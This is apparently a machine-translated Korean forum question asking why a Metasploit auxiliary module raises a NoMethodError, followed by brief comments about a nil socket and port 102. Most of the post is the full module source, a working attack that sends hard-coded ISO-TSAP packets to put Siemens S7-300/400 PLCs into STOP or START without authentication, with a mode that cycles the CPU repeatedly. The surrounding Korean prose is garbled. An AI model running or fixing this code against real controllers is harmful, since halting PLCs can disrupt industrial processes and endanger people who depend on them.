에 악용 실행하는 동안 noMethodError를 받고 :내가 메타 스플로 잇에 다음 코드를 사용하고 내 연구에 대한 메타 스플로 잇
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Rex::Socket::Tcp
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name'=> 'Siemens Simatic S7-300/400 CPU START/STOP Module',
'Description' => %q{
The Siemens Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAP
this modules allows an attacker to perform administrative commands without authentication.
This module allows a remote user to change the state of the PLC between
STOP and START, allowing an attacker to end process control by the PLC.
},
'Author' => 'Dillon Beresford',
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf' ],
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf' ],
],
'Version' => '$Revision$',
'DisclosureDate' => 'May 09 2011'
))
register_options(
[
Opt::RPORT(102),
OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),
OptInt.new('CYCLES',[true,"Set the amount of CPU STOP/RUN cycles.",10])
], self.class)
end
def run_host(ip)
begin
cpu = datastore['MODE'] || ''
cycles = datastore['CYCLES'] || ''
stop_cpu_pkt =
[
"\x03\x00\x00\x16\x11\xe0\x00\x00"+
"\x00\x01\x00\xc1\x02\x01\x00\xc2"+
"\x02\x01\x02\xc0\x01\x09",
"\x03\x00\x00\x19\x02\xf0\x80\x32"+
"\x01\x00\x00\xff\xff\x00\x08\x00"+
"\x00\xf0\x00\x00\x01\x00\x01\x03"+
"\xc0",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x00\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x40\x00\x01\x84\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x21\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x02\x00\x10\x00"+
"\x00\x29\x00\x00\x00\x00\x00\x09"+
"\x50\x5f\x50\x52\x4f\x47\x52\x41"+
"\x4d",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00"
]
start_cpu_pkt =
[
"\x03\x00\x00\x16\x11\xe0\x00\x00"+
"\x00\x01\x00\xc1\x02\x01\x00\xc2"+
"\x02\x01\x02\xc0\x01\x09",
"\x03\x00\x00\x19\x02\xf0\x80\x32"+
"\x01\x00\x00\xff\xff\x00\x08\x00"+
"\x00\xf0\x00\x00\x01\x00\x01\x03"+
"\xc0",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x00\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x40\x00\x01\x84\x00\x00\x00",
"\x03\x00\x00\x1f\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x01\x00\x0e\x00"+
"\x00\x04\x01\x12\x0a\x10\x02\x00"+
"\x10\x00\x00\x83\x00\x00\x00",
"\x03\x00\x00\x25\x02\xf0\x80\x32"+
"\x01\x00\x00\x00\x02\x00\x14\x00"+
"\x00\x28\x00\x00\x00\x00\x00\x00"+
"\xfd\x00\x00\x09\x50\x5f\x50\x52"+
"\x4f\x47\x52\x41\x4d"
]
# CPU STOP
if(cpu == 1)
connect()
stop_cpu_pkt.each do |i|
sock.put("#{i}")
sleep(0.005)
end
end
# CPU START
if(cpu == 2)
connect()
start_cpu_pkt.each do |i|
sock.put("#{i}")
sleep(0.005)
end
end
# STOP/START CPU
for n in 0..cycles
if(cpu == 3)
connect()
# We assume PLC is up and running (issue a stop command)
stop_cpu_pkt.each do |i|
sock.put("#{i}")
sleep(0.005)
end
connect()
# We assume PLC is has been stopped (issue a start command)
start_cpu_pkt.each do |i|
sock.put("#{i}")
sleep(0.005)
end
end
end
data = sock.get_once()
print_good("#{ip} PLC is running, iso-tsap port is open.")
if(cpu == 'true')
print_status("Putting the PLC into START mode.")
elsif(cpu == 'false')
print_status("Putting the PLC into STOP mode.")
end
disconnect()
rescue ::EOFError
end
end
end
것은 이것이 내가 모든 옵션을 변경할 수 있습니다 메타 스플로 잇에 악용 실행하는 경우. Auxiliary failed: NoMethodError undefined method 'get_once' for nil:NilClass
가이 코드를 작성하지 않은
(Metasploit_error 참조), 나는 불행하게도 Ruby 언어에 익숙하지 않다 : 는 나는 다음과 같은 오류가 실행하려고 할 때. 해결해 주시면 감사하겠습니다.
주 :이 문제가 해결되지 않습니다
'sock'은 null입니다. 소켓 포트가 올바른지 확인할 수 있습니다. –
포트를 스캔했는데 포트 102가 열렸습니다. – MichelRK
초기화 단계가 누락되지 않았습니까? –